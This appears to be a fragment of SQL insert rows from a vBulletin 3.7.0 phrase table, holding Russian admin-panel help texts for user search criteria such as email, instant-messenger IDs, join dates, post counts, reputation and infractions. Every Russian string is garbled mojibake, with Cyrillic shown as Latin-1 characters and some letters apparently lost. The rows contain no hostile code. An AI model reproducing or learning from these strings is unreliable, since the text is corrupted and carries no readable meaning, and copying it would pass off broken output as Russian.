(22226, -1, 'email_genlist_start_email_text', 'cphelptext', 'Àäðåñ ýëåêòðîÃÃîé ïî÷òû ïîëüçîâà òåëÿ äîëæåà ñîäåðæà òü ââåä¸ÃÃóþ çäåñü ñòðîêó. Äëÿ ïîëó÷åÃèÿ èÃôîðìà öèè î ñòðîêå, ïîäõîäÿùåé äëÿ èñïîëüçîâà Ãèÿ çäåñü, ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22227, -1, 'email_genlist_start_email_title', 'cphelptext', 'Ñîñòà âëÿþùèå à äðåñà ýëåêòðîÃÃîé ïî÷òû', 'vbulletin', '', 0, ''),
(22228, -1, 'email_genlist_start_parentemail_text', 'cphelptext', 'Åñëè èñêîìûé ïîëüçîâà òåëü îòÃîñèòñÿ ê ÷èñëó ïîëüçîâà òåëåé COPPA, òî îà äîëæåà áûë ââåñòè à äðåñ ýëåêòðîÃÃîé ïî÷òû ñâîèõ ðîäèòåëåé äëÿ ðåãèñòðà öèè. Åñëè ýòî òà ê, ââåäèòå çäåñü ñòðîêó äëÿ ïîèñêà à äðåñà ýëåêòðîÃÃîé ïî÷òû ðîäèòåëåé ýòîãî ïîëüçîâà òåëÿ. Äëÿ ïîëó÷åÃèÿ áîëüøåé èÃôîðìà öèè ïî ïîäõîäÿùåé äëÿ èñïîëüçîâà Ãèÿ çäåñü ñòðîêå ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22229, -1, 'email_genlist_start_parentemail_title', 'cphelptext', 'Ñîñòà âëÿþùèå à äðåñà ýëåêòðîÃÃîé ïî÷òû ðîäèòåëåé', 'vbulletin', '', 0, ''),
(22230, -1, 'email_genlist_start_coppauser_text', 'cphelptext', 'Åñëè óñòà ÃîâëåÃî â \"Äà \", áóäóò Ãà éäåÃû âñå ïîëüçîâà òåëè COPPA; ò.Ã¥. èì áóäåò äî 13 ëåò. Óñòà Ãîâèòå çäåñü \"Ãåò\", ÷òîáû ÃÃ¥ èñêà òü ïîëüçîâà òåëåé COPPA, èëè âûáåðèòå \"Îáà òèïà \" ÷òîáû èñêà òü è òåõ è äðóãèõ.', 'vbulletin', '', 0, ''),
(22231, -1, 'email_genlist_start_coppauser_title', 'cphelptext', 'Ãîëüçîâà òåëü COPPA', 'vbulletin', '', 0, ''),
(22232, -1, 'email_genlist_start_homepage_text', 'cphelptext', 'Ââåäèòå ñòðîêó, êîòîðà ÿ äîëæÃà ñîäåðæà òüñÿ â äîìà øÃåé ñòðà Ãè÷êå ïîëüçîâà òåëÿ. Ãîëüçîâà òåëè, ÃÃ¥ óêà çà âøèå à äðåñà ñâîèõ äîìà øÃèõ ñòðà Ãèö, áóäóò èñêëþ÷åÃû èç ðåçóëüòà òîâ ïîèñêà . Äëÿ ïîëó÷åÃèÿ èÃôîðìà öèè î ñòðîêå, ïîäõîäÿùåé äëÿ èñïîëüçîâà Ãèÿ çäåñü, ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22233, -1, 'email_genlist_start_homepage_title', 'cphelptext', 'Ñîñòà âëÿþùèå äîìà øÃåé ñòðà Ãèöû', 'vbulletin', '', 0, ''),
(22234, -1, 'email_genlist_start_icq_text', 'cphelptext', 'Ãîñêîëüêó Ãîìåðà ICQ ñîäåðæà ò òîëüêî öèôðû, âû äîëæÃû ââåñòè çäåñü ñòðîêó öèôð. Ãîëüçîâà òåëè, ÃÃ¥ Ãà ïèñà âøèå ñâîé Ãîìåð ICQ, áóäóò èñêëþ÷åÃû èç ðåçóëüòà òîâ ýòîãî ïîèñêà . Äëÿ ïîëó÷åÃèÿ èÃôîðìà öèè î ñòðîêå, ïîäõîäÿùåé äëÿ èñïîëüçîâà Ãèÿ çäåñü, ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22235, -1, 'email_genlist_start_icq_title', 'cphelptext', 'Ñîñòà âëÿþùèå Ãîìåðà ICQ', 'vbulletin', '', 0, ''),
(22236, -1, 'email_genlist_start_aim_text', 'cphelptext', 'Ââåäèòå ñòðîêó ñèìâîëîâ, êîòîðóþ äîëæåà ñîäåðæà òü AIM-èäåÃòèôèêà òîð ïîëüçîâà òåëÿ èëè åãî èìÿ ïîëüçîâà òåëÿ. Ãîëüçîâà òåëè áåç AIM-èäåÃòèôèêà òîðà à âòîìà òè÷åñêè èñêëþ÷à þòñÿ èç ðåçóëüòà òîâ ýòîãî ïîèñêà . Äëÿ ïîëó÷åÃèÿ äîïîëÃèòåëüÃîé èÃôîðìà öèè î ïîäõîäÿùèõ ñòðîêà õ ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22237, -1, 'email_genlist_start_aim_title', 'cphelptext', 'Ñîñòà âëÿþùèå AIM-èäåÃòèôèêà òîðà ', 'vbulletin', '', 0, ''),
(22238, -1, 'email_genlist_start_yahoo_text', 'cphelptext', 'Ââåäèòå ñòðîêó, ñîäåðæà ùóþñÿ â èäåÃòèôèêà òîðå Yahoo Messenger ïîëüçîâà òåëÿ. Ãîëüçîâà òåëè, ÃÃ¥ óêà çà âøèå ñâîèõ èäåÃòèôèêà òîðîâ, áóäóò èñêëþ÷åÃû èç ðåçóëüòà òîâ ïîèñêà . Äëÿ ïîëó÷åÃèÿ äîïîëÃèòåëüÃîé èÃôîðìà öèè ïî ïîäõîäÿùåé äëÿ èñïîëüçîâà Ãèÿ çäåñü ñòðîêå ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22239, -1, 'email_genlist_start_yahoo_title', 'cphelptext', 'ÈäåÃòèôèêà òîð Yahoo Messenger', 'vbulletin', '', 0, ''),
(22240, -1, 'email_genlist_start_msn_text', 'cphelptext', 'Ââåäèòå ñòðîêó, ñîäåðæà ùóþ MSN-èäåÃòèôèêà òîð ïîëüçîâà òåëÿ. Ãîëüçîâà òåëè, ÃÃ¥ óêà çà âøèå ñâîé MSN-èäåÃòèôèêà òîð, áóäóò èñêëþ÷åÃû èç ðåçóëüòà òîâ ïîèñêà . Äëÿ ïîëó÷åÃèÿ áîëüøåé èÃôîðìà öèè ïî ïîäõîäÿùåé äëÿ èñïîëüçîâà Ãèÿ çäåñü ñòðîêå ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22241, -1, 'email_genlist_start_msn_title', 'cphelptext', 'Èìÿ MSN', 'vbulletin', '', 0, ''),
(22242, -1, 'email_genlist_start_skype_text', 'cphelptext', 'Ââåäèòå ñòðîêó, ñîäåðæà ùóþ èìÿ ïîëüçîâà òåëÿ â Skype. Ãîëüçîâà òåëè, ÃÃ¥ óêà çà âøèå ñâî¸ èìÿ ïîëüçîâà òåëÿ â Skype, áóäóò èñêëþ÷åÃû èç ðåçóëüòà òîâ ïîèñêà . Äëÿ ïîëó÷åÃèÿ áîëüøåé èÃôîðìà öèè ïî ïîäõîäÿùåé äëÿ èñïîëüçîâà Ãèÿ çäåñü ñòðîêå ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22243, -1, 'email_genlist_start_skype_title', 'cphelptext', 'Èìÿ â Skype', 'vbulletin', 'zCarot', 1199284612, '3.7.0 Beta 4'),
(22244, -1, 'email_genlist_start_signature_text', 'cphelptext', 'Ââåäèòå ñòðîêó, ñîäåðæà ùóþñÿ â ïîäïèñè ïîëüçîâà òåëÿ. Ãîëüçîâà òåëè áåç ïîäïèñåé áóäóò èñêëþ÷åÃû èç ðåçóëüòà òîâ ïîèñêà . Äëÿ ïîëó÷åÃèÿ äîïîëÃèòåëüÃîé èÃôîðìà öèè ïî ïîäõîäÿùåé äëÿ èñïîëüçîâà Ãèÿ çäåñü ñòðîêå ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22245, -1, 'email_genlist_start_signature_title', 'cphelptext', 'Ñîñòà âëÿþùèå ïîäïèñè', 'vbulletin', '', 0, ''),
(22246, -1, 'email_genlist_start_usertitle_text', 'cphelptext', 'Ââåäèòå òåêñò, êîòîðûé äîëæåà ñîäåðæà òüñÿ â ñòà òóñå ïîëüçîâà òåëÿ. Ãòî ïðèìåÃèìî äà æå åñëè âû ÃÃ¥ ðà çðåøà åòå îáû÷Ãûå çà ãîëîâêè ïîëüçîâà òåëåé, ïîñêîëüêó ýòè çà ãîëîâêè äëÿ êà æäîãî ïîëüçîâà òåëÿ õðà Ãÿòñÿ ñ èõ èìåÃà ìè, ïîýòîìó áóäåò Ãà éäåÃà ãðóïïà çà ãîëîâêîâ ïî óìîë÷à Ãèþ. Äëÿ ïîëó÷åÃèÿ äîïîëÃèòåëüÃîé èÃôîðìà öèè ïî ïîäõîäÿùåé ñþäà ñòðîêå ñì. Ñîñòà âëÿþùèå èìåÃè ïîëüçîâà òåëÿ .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22247, -1, 'email_genlist_start_usertitle_title', 'cphelptext', 'Ñîñòà âëÿþùèå ñòà òóñà ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(22248, -1, 'email_genlist_start_joindateafter_text', 'cphelptext', 'Ââåäèòå äà òó, ÷òîáû Ãà éòè ïîëüçîâà òåëåé, çà ðåãèñòðèðîâà âøèõñÿ ïîçæå Ãåå. Ôîðìà ò äà òû: ãããã-ìì-ää; Ãà ïðèìåð, 2005-02-23. Ãòîò êðèòåðèé ìîæåò ðà áîòà òü ñîâìåñòÃî ñ êðèòåðèåì ïîèñêà çà ðåãèñòðèðîâà âøèõñÿ äî óêà çà ÃÃîé äà òû, òîãäà áóäåò çà äà à èÃòåðâà ë äà ò. Ó÷òèòå, ÷òî åñëè âû èñïîëüçóåòå îáà êðèòåðèÿ, òî ýòà äà òà äîëæÃà ïðåäøåñòâîâà òü äà òå âòîðîãî êðèòåðèÿ, èÃà ÷å ÃÃ¥ áóäåò Ãà éäåÃî Ãè îäÃîãî ïîëüçîâà òåëÿ! (Ñì. Ãåãèñòðà öèÿ äî... ).', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22249, -1, 'email_genlist_start_joindateafter_title', 'cphelptext', 'Ãåãèñòðà öèÿ ïîñëå', 'vbulletin', '', 0, ''),
(22250, -1, 'email_genlist_start_joindatebefore_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, çà ðåãèñòðèðîâà âøèåñÿ äî ýòîé äà òû. Ôîðìà ò: ãããã-ìì-ää; Ãà ïðèìåð, 2005-02-23. Ãòîò êðèòåðèé ìîæåò ðà áîòà òü ñîâìåñòÃî ñ êðèòåðèåì ïîèñêà çà ðåãèñòðèðîâà âøèõñÿ ïîñëå çà äà ÃÃîé äà òû, òîãäà áóäåò çà äà à èÃòåðâà ë äà ò ðåãèñòðà öèè. Ó÷òèòå, ÷òî åñëè âû èñïîëüçóåòå îáà êðèòåðèÿ, òî ýòà äà òà äîëæÃà ïðåâîñõîäèòü äà òó âòîðîãî êðèòåðèÿ, èÃà ÷å ÃÃ¥ áóäåò Ãà éäåÃî Ãè îäÃîãî ïîëüçîâà òåëÿ! (Ñì. Ãåãèñòðà öèÿ ïîñëå... ).', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22251, -1, 'email_genlist_start_joindatebefore_title', 'cphelptext', 'Ãåãèñòðà öèÿ äî', 'vbulletin', '', 0, ''),
(22252, -1, 'email_genlist_start_lastactivityafter_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, çà ãðóæà âøèå ñòðà Ãèöû ôîðóìà ïîçæå ýòîé äà òû. Ôîðìà ò: ãããã-ìì-ää; Ãà ïðèìåð, 2005-07-21. Ãòîò êðèòåðèé ìîæåò èñïîëüçîâà òüñÿ ñîâìåñòÃî ñ êðèòåðèåì ïîèñêà ïîëüçîâà òåëÿ ÃîñëåäÃÿÿ à êòèâÃîñòü äî, òîãäà áóäåò çà äà à èÃòåðâà ë âðåìåÃè ïîñëåäÃåé à êòèâÃîñòè ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(22253, -1, 'email_genlist_start_lastactivityafter_title', 'cphelptext', 'ÃîñëåäÃÿÿ à êòèâÃîñòü ïîñëå', 'vbulletin', '', 0, ''),
(22254, -1, 'email_genlist_start_lastactivitybefore_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, çà ãðóæà âøèå ñòðà Ãèöû ôîðóìà äî ýòîé äà òû. Ôîðìà ò: ãããã-ìì-ää; Ãà ïðèìåð, 2005-07-21. Ãòîò êðèòåðèé ìîæåò èñïîëüçîâà òüñÿ ñîâìåñòÃî ñ êðèòåðèåì ïîèñêà ïîëüçîâà òåëÿ ÃîñëåäÃÿÿ à êòèâÃîñòü ïîñëå, òîãäà áóäåò çà äà à èÃòåðâà ë âðåìåÃè ïîñëåäÃåé à êòèâÃîñòè ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(22255, -1, 'email_genlist_start_lastactivitybefore_title', 'cphelptext', 'ÃîñëåäÃÿÿ à êòèâÃîñòü äî', 'vbulletin', '', 0, ''),
(22256, -1, 'email_genlist_start_lastpostafter_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, ïîñëåäÃåå ñîîáùåÃèå êîòîðûõ áûëî Ãà ïèñà Ãî ïîçæå ýòîé äà òû è âðåìåÃè. Ôîðìà ò äà òû è âðåìåÃè: ãããã-ìì-ää ÷÷:ìì:ññ; Ãà ïðèìåð, ïî äà òå è âðåìåÃè 2005-02-23 15:54:33 áóäóò Ãà éäåÃû âñå, êòî Ãà ïèñà ë ïîñëåäÃåå ñîîáùåÃèå ïîñëå 15:54:33 23 ôåâðà ëÿ 2005 ãîäà . Ãòîò êðèòåðèé ìîæåò èñïîëüçîâà òüñÿ ñîâìåñòÃî ñ êðèòåðèåì ïîèñêà ïîëüçîâà òåëÿ ïî äà òå è âðåìåÃè, ðà Ãåå êîòîðûõ áûëî Ãà ïèñà Ãî ïîñëåäÃåå ñîîáùåÃèå, òîãäà áóäåò çà äà à èÃòåðâà ë âðåìåÃè Ãà ïèñà Ãèÿ ïîñëåäÃåãî ñîîáùåÃèÿ. Ó÷òèòå, ÷òî ïðè èñïîëüçîâà Ãèè îáîèõ êðèòåðèåâ, ýòè äà òà è âðåìÿ äîëæÃû ïðåäøåñòâîâà òü äà òå è âðåìåÃè âòîðîãî êðèòåðèÿ, èÃà ÷å ÃÃ¥ áóäåò Ãà éäåÃî Ãè îäÃîãî ïîëüçîâà òåëÿ! (Ñì. ÃîñëåäÃåå ñîîáùåÃèå Ãà ïèñà Ãî äî... ).', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22257, -1, 'email_genlist_start_lastpostafter_title', 'cphelptext', 'ÃîñëåäÃåå ñîîáùåÃèå ïîñëå', 'vbulletin', '', 0, ''),
(22258, -1, 'email_genlist_start_lastpostbefore_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, ïîñëåäÃåå ñîîáùåÃèå êîòîðûõ áûëî Ãà ïèñà Ãî äî ýòîé äà òû è âðåìåÃè. Ôîðìà ò äà òû è âðåìåÃè: ãããã-ìì-ää ÷÷:ìì:ññ; Ãà ïðèìåð, ïî äà òå è âðåìåÃè 2005-02-23 15:55:25 áóäóò Ãà éäåÃû âñå, êòî Ãà ïèñà ë ïîñëåäÃåå ñîîáùåÃèå äî 15:55:25 23 ôåâðà ëÿ 2005 ãîäà . Ãòîò êðèòåðèé ìîæåò èñïîëüçîâà òüñÿ ñîâìåñòÃî ñ êðèòåðèåì ïîèñêà ïîëüçîâà òåëÿ ïî äà òå è âðåìåÃè, ïîçæå êîòîðûõ áûëî Ãà ïèñà Ãî ïîñëåäÃåå ñîîáùåÃèå, òîãäà áóäåò çà äà à èÃòåðâà ë âðåìåÃè Ãà ïèñà Ãèÿ ïîñëåäÃåãî ñîîáùåÃèÿ. Ó÷òèòå, ÷òî ïðè èñïîëüçîâà Ãèè îáîèõ êðèòåðèåâ, ýòè äà òà è âðåìÿ äîëæÃû ïðåâîñõîäèòü äà òó è âðåìÿ ïåðâîãî êðèòåðèÿ, èÃà ÷å ÃÃ¥ áóäåò Ãà éäåÃî Ãè îäÃîãî ïîëüçîâà òåëÿ! (Ñì. ÃîñëåäÃåå ñîîáùåÃèå Ãà ïèñà Ãî ïîñëå ... ).', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22259, -1, 'email_genlist_start_lastpostbefore_title', 'cphelptext', 'ÃîñëåäÃåå ñîîáùåÃèå äî', 'vbulletin', '', 0, ''),
(22260, -1, 'email_genlist_start_birthdayafter_text', 'cphelptext', 'Ââåäèòå äà òó, è áóäóò Ãà éäåÃû ïîëüçîâà òåëè, ÷åé äåÃü ðîæäåÃèÿ ÃÎÑËÅ ââåäåÃÃîé äà òû. Ôîðìà ò äà òû: ãããã-ìì-ää; Ãà ïðèìåð, 1987-07-14. Ãîëüçîâà òåëè, êîòîðûå ÃÃ¥ ââåëè äà òó ñâîåãî ðîæäåÃèÿ, áóäóò à âòîìà òè÷åñêè èñêëþ÷åÃû èç ðåçóëüòà òîâ ïîèñêà . Ãòîò êðèòåðèé ìîæåò èñïîëüçîâà òüñÿ ñîâìåñòÃî ñ êðèòåðèåì ïîèñêà ïîëüçîâà òåëåé ñ äÃÿìè ðîæäåÃèÿ äî çà äà ÃÃîé äà òû, â ýòîì ñëó÷à å ñîçäà åòñÿ çà äà ÃÃûé èÃòåðâà ë äÃåé ðîæäåÃèÿ. Ó÷èòûâà éòå, ÷òî åñëè âû èñïîëüçóåòå îáà êðèòåðèÿ, ýòà äà òà äîëæÃà ïðåäøåñòâîâà òü äà òå âòîðîãî êðèòåðèÿ, èÃà ÷å âû ÃÃ¥ Ãà éäåòå Ãè îäÃîãî ïîëüçîâà òåëÿ! (Ñì. Äà òà ðîæäåÃèÿ äî... ).', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22261, -1, 'email_genlist_start_birthdayafter_title', 'cphelptext', 'ÄåÃü ðîæäåÃèÿ ïîñëå', 'vbulletin', '', 0, ''),
(22262, -1, 'email_genlist_start_birthdaybefore_text', 'cphelptext', 'Ââåäèòå äà òó, è áóäóò Ãà éäåÃû ïîëüçîâà òåëè, ÷åé äåÃü ðîæäåÃèÿ ÄÎ ââåäåÃÃîé äà òû. Ôîðìà ò äà òû: ãããã-ìì-ää; Ãà ïðèìåð, 1987-07-14. Ãòîò êðèòåðèé ìîæåò èñïîëüçîâà òüñÿ ñîâìåñòÃî ñ êðèòåðèåì ïîèñêà ïîëüçîâà òåëåé ñ äÃÿìè ðîæäåÃèÿ ïîñëå çà äà ÃÃîé äà òû. Ó÷òèòå, ÷òî åñëè âû èñïîëüçóåòå îáà êðèòåðèÿ, ýòà äà òà äîëæÃà áûòü ïîçæå äà òû ïåðâîãî êðèòåðèÿ, èÃà ÷å ÃÃ¥ áóäåò Ãà éäåà Ãè îäèà ïîëüçîâà òåëü! (Ñì. ÄåÃü ðîæäåÃèÿ ïîñëå... ).', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22263, -1, 'email_genlist_start_birthdaybefore_title', 'cphelptext', 'ÄåÃü ðîæäåÃèÿ äî', 'vbulletin', '', 0, ''),
(22264, -1, 'email_genlist_start_postslower_text', 'cphelptext', 'Êîëè÷åñòâî ñîîáùåÃèé Ãà éäåÃÃûõ ïîëüçîâà òåëåé äîëæÃî ïðåâûøà òü èëè ðà âÃÿòüñÿ ýòîìó ÷èñëó. Ãòîò êðèòåðèé ìîæåò áûòü èñïîëüçîâà à ñîâìåñòÃî ñ êðèòåðèåì ïîèñêà ïîëüçîâà òåëåé, ðà çìåñòèâøèõ ñîîáùåÃèé ìåÃüøå, ÷åì çà äà ÃÃîå ÷èñëî, â ýòîì ñëó÷à å ñîçäà åòñÿ èÃòåðâà ë äëÿ êîëè÷åñòâà ñîîáùåÃèé. Ó÷òèòå, ÷òî ïðè èñïîëüçîâà Ãèè îáîèõ êðèòåðèåâ ýòî ÷èñëî äîëæÃî áûòü ìåÃüøå ÷èñëà , çà äà âà åìîãî âòîðûì êðèòåðèåì, èÃà ÷å ÃÃ¥ áóäåò Ãà éäåÃî Ãè îäÃîãî ïîëüçîâà òåëÿ! (Ñì. ÑîîáùåÃèé ìåÃüøå... )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22265, -1, 'email_genlist_start_postslower_title', 'cphelptext', 'ÑîîáùåÃèé áîëüøå èëè ðà âÃî', 'vbulletin', '', 0, ''),
(22266, -1, 'email_genlist_start_postsupper_text', 'cphelptext', 'Êîëè÷åñòâî ñîîáùåÃèé Ãà éäåÃÃûõ ïîëüçîâà òåëåé äîëæÃî áûòü ìåÃüøå ýòîãî ÷èñëà . Ãòîò êðèòåðèé ìîæåò èñïîëüçîâà òüñÿ ñîâìåñòÃî ñ êðèòåðèåì ïîèñêà ïîëüçîâà òåëåé, ðà çìåñòèâøèõ ñîîáùåÃèé áîëüøå èëè ðà âÃîìó çà äà ÃÃîìó ÷èñëó, â ýòîì ñëó÷à å ñîçäà åòñÿ èÃòåðâà ë äëÿ êîëè÷åñòâà ñîîáùåÃèé. Ó÷òèòå, ÷òî ïðè èñïîëüçîâà Ãèè îáîèõ êðèòåðèåâ ýòî ÷èñëî äîëæÃî ïðåâûøà òü èëè ðà âÃÿòüñÿ ÷èñëó, çà äà ÃÃîìó ïåðâûì êðèòåðèåì, èÃà ÷å ÃÃ¥ áóäåò Ãà éäåÃî Ãè îäÃîãî ïîëüçîâà òåëÿ! (Ñì. ÑîîáùåÃèé áîëüøå èëè ðà âÃî... )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22267, -1, 'email_genlist_start_postsupper_title', 'cphelptext', 'ÑîîáùåÃèé ìåÃüøå', 'vbulletin', '', 0, ''),
(22268, -1, 'email_genlist_start_reputationlower_text', 'cphelptext', 'ÓðîâåÃü ðåïóòà öèè Ãà éäåÃÃûõ ïîëüçîâà òåëåé áîëüøå èëè ðà âÃÿòüñÿ ýòîìó ÷èñëó. Ãòîò êðèòåðèé ìîæåò èñïîëüçîâà òüñÿ ñîâìåñòÃî ñ êðèòåðèåì ïîèñêà ïîëüçîâà òåëåé ñ ðåïóòà öèåé ìåÃüøå çà äà ÃÃîé, â ýòîì ñëó÷à å ñîçäà åòñÿ èÃòåðâà ë ïîäõîäÿùèõ ðåïóòà öèé. Ó÷òèòå, ÷òî ïðè èñïîëüçîâà Ãèè îáîèõ êðèòåðèåâ, ýòî ÷èñëî äîëæÃî áûòü ìåÃüøå ÷èñëà , çà äà âà åìîãî âòîðûì êðèòåðèåì, èÃà ÷å ÃÃ¥ áóäåò Ãà éäåÃî Ãè îäÃîãî ïîëüçîâà òåëÿ! (Ñì. Ãåïóòà öèÿ ìåÃüøå... )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22269, -1, 'email_genlist_start_reputationlower_title', 'cphelptext', 'ÓðîâåÃü ðåïóòà öèè áîëüøå èëè ðà âÃî', 'vbulletin', '', 0, ''),
(22270, -1, 'email_genlist_start_reputationupper_text', 'cphelptext', 'ÓðîâåÃü ðåïóòà öèè Ãà éäåÃÃûõ ïîëüçîâà òåëåé ìåÃüøå ýòîãî ÷èñëà . Ãòîò êðèòåðèé ìîæåò èñïîëüçîâà òüñÿ ñîâìåñòÃî ñ êðèòåðèåì ïîèñêà ïîëüçîâà òåëåé ñ ðåïóòà öèåé áîëüøå èëè ðà âÃîé çà äà ÃÃîé, â ýòîì ñëó÷à å ñîçäà åòñÿ èÃòåðâà ë ïîäõîäÿùèõ ðåïóòà öèé. Ó÷òèòå, ÷òî ïðè èñïîëüçîâà Ãèè îáîèõ êðèòåðèåâ, ýòî ÷èñëî äîëæÃî áûòü áîëüøå ÷èñëà , çà äà âà åìîãî âòîðûì êðèòåðèåì, èÃà ÷å ÃÃ¥ áóäåò Ãà éäåÃî Ãè îäÃîãî ïîëüçîâà òåëÿ! (Ñì. Ãåïóòà öèÿ áîëüøå èëè ðà âÃà ... )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22271, -1, 'email_genlist_start_reputationupper_title', 'cphelptext', 'ÓðîâåÃü ðåïóòà öèè ìåÃüøå', 'vbulletin', '', 0, ''),
(22272, -1, 'email_genlist_start_warningslower_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, èìåþùèå êîëè÷åñòâî ïðåäóïðåæäåÃèé áîëüøå èëè ðà âÃîå óêà çà ÃÃîìó çäåñü.', 'vbulletin', 'zCarot', 1199284779, '3.7.0 Beta 4'),
(22273, -1, 'email_genlist_start_warningslower_title', 'cphelptext', 'Êîëè÷åñòâî ïðåäóïðåæäåÃèé áîëüøå èëè ðà âÃî', 'vbulletin', 'zCarot', 1199284779, '3.7.0 Beta 4'),
(22274, -1, 'email_genlist_start_warningsupper_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, èìåþùèå êîëè÷åñòâî ïðåäóïðåæäåÃèé ìåÃüøå óêà çà ÃÃîãî çäåñü.', 'vbulletin', 'zCarot', 1199284811, '3.7.0 Beta 4'),
(22275, -1, 'email_genlist_start_warningsupper_title', 'cphelptext', 'Êîëè÷åñòâî ïðåäóïðåæäåÃèé ìåÃüøå ÷åì', 'vbulletin', 'zCarot', 1199284811, '3.7.0 Beta 4'),
(22276, -1, 'email_genlist_start_infractionslower_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, èìåþùèå êîëè÷åñòâî Ãà ðóøåÃèé áîëüøå èëè ðà âÃîå óêà çà ÃÃîìó çäåñü.', 'vbulletin', 'zCarot', 1199284953, '3.7.0 Beta 4'),
(22277, -1, 'email_genlist_start_infractionslower_title', 'cphelptext', 'Êîëè÷åñòâî Ãà ðóøåÃèé áîëüøå èëè ðà âÃî', 'vbulletin', 'zCarot', 1199284884, '3.7.0 Beta 4'),
(22278, -1, 'email_genlist_start_infractionsupper_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, èìåþùèå êîëè÷åñòâî Ãà ðóøåÃèé ìåÃüøå óêà çà ÃÃîãî çäåñü.', 'vbulletin', 'zCarot', 1199284932, '3.7.0 Beta 4'),
(22279, -1, 'email_genlist_start_infractionsupper_title', 'cphelptext', 'Êîëè÷åñòâî Ãà ðóøåÃèé ìåÃüøå ÷åì', 'vbulletin', 'zCarot', 1199284932, '3.7.0 Beta 4'),
(22280, -1, 'email_genlist_start_pointslower_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, èìåþùèå êîëè÷åñòâî áà ëëîâ Ãà ðóøåÃèé áîëüøå èëè ðà âÃîå óêà çà ÃÃîìó çäåñü.', 'vbulletin', 'zCarot', 1199285007, '3.7.0 Beta 4'),
(22281, -1, 'email_genlist_start_pointslower_title', 'cphelptext', 'Êîëè÷åñòâî áà ëëîâ Ãà ðóøåÃèé áîëüøå èëè ðà âÃî', 'vbulletin', 'zCarot', 1199285007, '3.7.0 Beta 4'),
(22282, -1, 'email_genlist_start_pointsupper_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, èìåþùèå êîëè÷åñòâî áà ëëîâ Ãà ðóøåÃèé ìåÃüøå óêà çà ÃÃîãî çäåñü.', 'vbulletin', 'Kier', 1201172436, '3.7.0 Beta 5'),
(22283, -1, 'email_genlist_start_pointsupper_title', 'cphelptext', 'Êîëè÷åñòâî áà ëëîâ Ãà ðóøåÃèé ìåÃüøå ÷åì', 'vbulletin', 'zCarot', 1199285055, '3.7.0 Beta 4'),
(22284, -1, 'email_genlist_start_useridlower_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, ÷åé èäåÃòèôèêà òîð (ID) áîëüøå èëè ðà âåà óêà çà ÃÃîìó çäåñü.', 'vbulletin', 'zCarot', 1207657111, '3.7.0 Release Candidate 3'),
(22285, -1, 'email_genlist_start_useridlower_title', 'cphelptext', 'Ãîìåð (ID) ïîëüçîâà òåëÿ áîëüøå èëè ðà âåÃ', 'vbulletin', 'zCarot', 1207657111, '3.7.0 Release Candidate 3'),
(22286, -1, 'email_genlist_start_useridupper_text', 'cphelptext', 'Ãóäóò Ãà éäåÃû ïîëüçîâà òåëè, ÷åé èäåÃòèôèêà òîð (ID) ìåÃüøå, ÷åì óêà çà ÃÃûé çäåñü.', 'vbulletin', 'zCarot', 1207657452, '3.7.0 Release Candidate 3'),
(22287, -1, 'email_genlist_start_useridupper_title', 'cphelptext', 'Ãîìåð (ID) ïîëüçîâà òåëÿ ìåÃüøå', 'vbulletin', 'zCarot', 1207657452, '3.7.0 Release Candidate 3'),
